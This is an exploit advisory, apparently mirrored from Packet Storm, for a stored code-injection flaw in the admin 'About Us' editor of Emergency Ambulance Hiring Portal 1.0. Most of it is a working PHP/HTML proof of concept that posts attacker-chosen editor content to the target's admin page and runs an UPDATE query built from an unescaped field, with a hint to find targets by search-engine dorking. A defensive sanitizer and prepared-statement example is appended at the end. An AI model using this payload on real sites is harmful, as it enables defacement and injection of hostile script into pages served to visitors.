Emergency Ambulance Hiring Portal 1.0 WYSIWYG Code Injection exploit



## https://sploitus.com/exploit?id=PACKETSTORM:181442

```
=============================================================================================================================================
| # Title     : Emergency Ambulance Hiring Portal 1.0 (WYSIWYG) code injection Vulnerability                                                |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            |
| # Vendor    : https://phpgurukul.com/emergency-ambulance-hiring-portal-using-php-and-mysql/                                               |
=============================================================================================================================================
```

poc :

[+] Dorking in Google or other search engine.

[+] Part 01 : about-us.php

[+] This payload injects code of your choice into the database via NicEdit, a WYSIWYG editor (V: 0.9 r25), which is called inside the file /hms/admin/about-us.php.

[+] Line 2 : Make sure to include your database connection here

[+] Line 44 : Send the form data using fetch API (Set your target url)

[+] Save payload as poc.php in your localhost path.

[+] payload :

```php
<?php
include('http://127.0.0.1/eahp/admin/includes/dbconnection.php'); // Make sure to include your database connection here

if (isset($_POST['submit'])) {
    $pagetitle = $_POST['pagetitle'];
    $pagedes = $con->real_escape_string($_POST['pagedes']);

    $query = mysqli_query($con, "UPDATE tblpage SET PageTitle='$pagetitle', PageDescription='$pagedes' WHERE PageType='aboutus'");
    if ($query) {
        echo '<script>alert("About Us has been updated.")</script>';
    } else {
        echo '<script>alert("Something Went Wrong. Please try again.")</script>';
    }
    exit;
}
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>indoushka | Update About Us Content</title>

    <!-- NicEdit Script -->
    <script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script>
    <script type="text/javascript">
        // Apply NicEdit to all text areas when the DOM is loaded
        bkLib.onDomLoaded(nicEditors.allTextAreas);

        // Function to handle form submission using JavaScript
        function submitForm(event) {
            event.preventDefault(); // Prevent default form submission

            const pagetitle = document.getElementById('pagetitle').value;
            const pagedes = nicEditors.findEditor('pagedes').getContent(); // Get the NicEdit content

            // Prepare the form data to be sent
            const formData = new FormData();
            formData.append('pagetitle', pagetitle);
            formData.append('pagedes', pagedes);
            formData.append('submit', true);

            // Send the form data using fetch API
            fetch('http://127.0.0.1/eahp/admin/about-us.php', {
                method: 'POST',
                body: formData,
            })
            .then(response => response.text())
            .then(data => {
                alert('About Us content has been updated successfully.');
                console.log(data); // Handle the response from the server
            })
            .catch(error => {
                console.error('Error:', error);
            });
        }
    </script>
    <style>
        /* Center the form container */
        .editor-container {
            max-width: 800px;
            margin: 0 auto; /* Center horizontally */
            padding: 20px;
            text-align: center; /* Center the content inside */
        }
        /* Ensure the textarea takes the full width */
        #pagedes {
            width: 100%;
            height: 300px;
            margin: 0 auto;
        }
    </style>
</head>
<body>
<div id="app">
    <div class="app-content">
        <div class="main-content">
            <div class="wrap-content container" id="container">
                <!-- Page Title Section -->
                <section id="page-title">
                    <div class="row">
                        <div class="col-sm-8">
                            <h1 class="mainTitle">Update the About Us Content</h1>
                        </div>
                        </li>
                        </ol>
                    </div>
                </section>
                <!-- Form Section -->
                <div class="container-fluid container-fullw bg-white">
                    <div class="row">
                        <div class="col-md-12">
                            <!-- Centering the form using a wrapper div -->
                            <div class="editor-container">
                                <form class="forms-sample" method="post" onsubmit="submitForm(event);">
                                    <div class="form-group">
                                        <label for="pagetitle">Page Title</label>
                                        <input id="pagetitle" name="pagetitle" type="text" class="form-control" required>
                                    </div>
                                    <div class="form-group">
                                        <label for="pagedes">Page Description</label>
                                        <!-- NicEdit will enhance this textarea -->
                                        <textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea>
                                    </div>
                                    <button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button>
                                </form>
                            </div>
                        </div>
                    </div>
                </div>
                <!-- End Form Section -->
            </div>
        </div>
    </div>
</div>
<!-- Footer -->
</body>
</html>
```

Greetings to : jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr
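A defensive counterpart to the update logic shown in the payload, as an added example that is not part of the advisory or the vendor's code: the rich-text body is reduced to an allow-list of tags with all attributes removed, and both fields are written through a prepared statement. The function names `sanitize_rich_text()` and `save_about_us()` are hypothetical; the table and column names are taken from the query in the payload, and the sample input is constructed.

```php
<?php
// Added example, not vendor code. sanitize_rich_text() and save_about_us()
// are hypothetical names; tblpage and its columns come from the PoC's query.

function sanitize_rich_text(string $html): string
{
    $allowed = ['p', 'br', 'b', 'i', 'u', 'strong', 'em', 'ul', 'ol', 'li'];
    $doc = new DOMDocument();
    // Wrap the fragment in a known root; the XML prolog forces UTF-8 parsing.
    @$doc->loadHTML('<?xml encoding="UTF-8"><div id="root">' . $html . '</div>',
        LIBXML_NONET | LIBXML_NOERROR | LIBXML_NOWARNING);
    $xp   = new DOMXPath($doc);
    $root = $xp->query('//div[@id="root"]')->item(0);
    if ($root === null) {
        return '';                               // fail closed on unparsable input
    }
    foreach (iterator_to_array($xp->query('.//*', $root)) as $el) {
        if (!in_array($el->nodeName, $allowed, true)) {
            // Disallowed element (script, img, iframe, div, ...): keep only its text.
            $el->parentNode->replaceChild($doc->createTextNode($el->textContent), $el);
            continue;
        }
        // Allowed element: drop every attribute (onclick, style, href, ...).
        while ($el->attributes->length > 0) {
            $el->removeAttributeNode($el->attributes->item(0));
        }
    }
    $out = '';
    foreach ($root->childNodes as $child) {
        $out .= $doc->saveHTML($child);          // text nodes are entity-escaped here
    }
    return $out;
}

function save_about_us(mysqli $con, string $title, string $html): bool
{
    $title = trim(strip_tags($title));           // title is plain text only
    $body  = sanitize_rich_text($html);          // body is allow-listed HTML
    $stmt  = $con->prepare(
        "UPDATE tblpage SET PageTitle = ?, PageDescription = ? WHERE PageType = 'aboutus'");
    $stmt->bind_param('ss', $title, $body);      // bound values, no string concatenation
    return $stmt->execute();
}

// Constructed sample input; runs from the CLI without a database.
if (PHP_SAPI === 'cli') {
    echo sanitize_rich_text('<p onclick="x()">Hi <b>there</b><script>alert(1)</script></p>'), "\n";
}
```

Pages that display the stored title should still pass it through `htmlspecialchars()` at output time, since sanitizing on write does not protect rows stored before the fix.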